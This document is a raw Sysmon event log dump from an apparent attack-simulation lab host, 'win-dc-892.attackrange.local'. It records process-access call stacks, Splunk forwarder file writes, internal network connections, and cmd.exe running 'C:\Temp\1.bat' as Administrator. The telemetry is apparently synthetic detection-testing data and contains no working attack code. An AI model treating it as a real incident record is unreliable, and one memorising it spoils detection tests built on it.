Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.475{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.475{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.475{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.475{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.475{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.428{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.428{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.428{266CAFBE-659C-6064-4B01-00000000AE01}15325312C:\Windows\system32\conhost.exe{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.428{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-646C-6064-1300-00000000AE01}12283856C:\Windows\System32\svchost.exe{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-646C-6064-1300-00000000AE01}12283856C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:48.413{266CAFBE-64C5-6064-A500-00000000AE01}43562996C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+18d25c|C:\Windows\System32\SHELL32.dll+18cfb3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.423{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" "C:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000009725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.147{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D35842A88901C8730677FC62B81A8BB,SHA256=39BF712D7A9C334FC2D059FF5DE078A2E754DFC803523B0F9DE218A9815C44F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:49.256{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A4B014FBD218B22C3772A92B3272981,SHA256=AA54E110C2AD86B53C50A79729D37D01D93A6C2B3D08B7F68D8AB19A3208E38D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:49.493{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53645-false10.0.1.12-8000- 354300x80000000000000009755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:49.212{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53644-false10.0.1.12-8089- 23542300x80000000000000009754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:50.272{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7E613CC518755AC6750C21F9010366C,SHA256=6622ACF410579F1F55A7F0C92C8E925F77A12F8901E9FDC27BB9C1D257308EB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:51.318{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C13F57B449ED39EEBD2568CF96FE58A5,SHA256=7A89BABEBC96F36C9DBA4FB07163D4E52021F99E2C574F72B543F03817B32305,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:52.349{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DC4635C7FC1015021DC40DE10AB724,SHA256=F4E4D85151D53DC4AF4DED51B0E5C2930FB9BE0AD7CDDF7C84D0951CBCEB1FA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:53.395{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A4FE5A6CCA248D790063986A01CFD23,SHA256=EF64E9BD87B3897B56A2ACB865D6BE5324951435041CA364D1EF643843C81DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:54.411{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A66A7D299C780A2F163D2D0CC72E4EC,SHA256=0FB4713AF23E58C5E34B2DE55BB4CD9A9C26793CAE5FEC0190AF0E682D3FB4B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.520{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EF94A67A101A2030D69BBE5B938EBF2,SHA256=E18A2ACF7F5732D0FD77E8CFB537F048106BF0A66D82DC244B7F91FF2CD77D9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 